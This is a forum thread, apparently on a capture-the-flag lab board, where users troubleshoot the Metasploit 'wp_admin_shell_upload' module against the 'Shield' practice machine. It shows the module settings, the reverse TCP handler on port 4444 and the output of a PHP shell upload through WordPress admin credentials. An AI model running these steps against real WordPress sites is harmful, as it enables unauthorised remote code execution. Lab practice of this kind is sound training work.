Starting Point Shield

edited May 10 in Machines

Hey all,

  After I set all my options, which i've tripple checked i get the following

msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.18:4444
[
] Authenticating with WordPress using admin:[email protected]!...
[+] Authenticated with WordPress
[] Preparing payload...
[
] Uploading payload...
[] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php...
[!] This exploit may require manual cleanup of 'CXffIyrlNi.php' on the target
[!] This exploit may require manual cleanup of 'isEHXJHygE.php' on the target
[!] This exploit may require manual cleanup of '../isEHXJHygE' on the target
[
] Exploit completed, but no session was created.

am I doing something wrong? Please help

Comments

  • Type your comment> @R4ZZB33RY said:

    Hey all,

      After I set all my options, which i've tripple checked i get the following
    

    msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

    [] Started reverse TCP handler on 10.10.14.18:4444
    [
    ] Authenticating with WordPress using admin:[email protected]!...
    [+] Authenticated with WordPress
    [] Preparing payload...
    [
    ] Uploading payload...
    [] Executing the payload at /wordpress/wp-content/plugins/isEHXJHygE/CXffIyrlNi.php...
    [!] This exploit may require manual cleanup of 'CXffIyrlNi.php' on the target
    [!] This exploit may require manual cleanup of 'isEHXJHygE.php' on the target
    [!] This exploit may require manual cleanup of '../isEHXJHygE' on the target
    [
    ] Exploit completed, but no session was created.

    am I doing something wrong? Please help

    I figured it out folks! It was my firewall.

  • edited June 28

    I'm having similar issues on Kali. Web UI works with same user/pass. Any ideas?

           =[ metasploit v5.0.93-dev                          ]
    + -- --=[ 2029 exploits - 1103 auxiliary - 344 post       ]
    + -- --=[ 562 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    
    Metasploit tip: Display the Framework log using the log command, learn more with help log
    
    msf5 > use exploit/unix/webapp/wp_admin_shell_upload
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password [email protected]!
    password => [email protected]!
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
    username => admin
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.29
    rhosts => 10.10.10.29
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
    targeturi => /wordpress
    msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
    
    [-] Exploit failed: An exploitation error occurred.
    [*] Exploit completed, but no session was created.
    
Sign In to comment.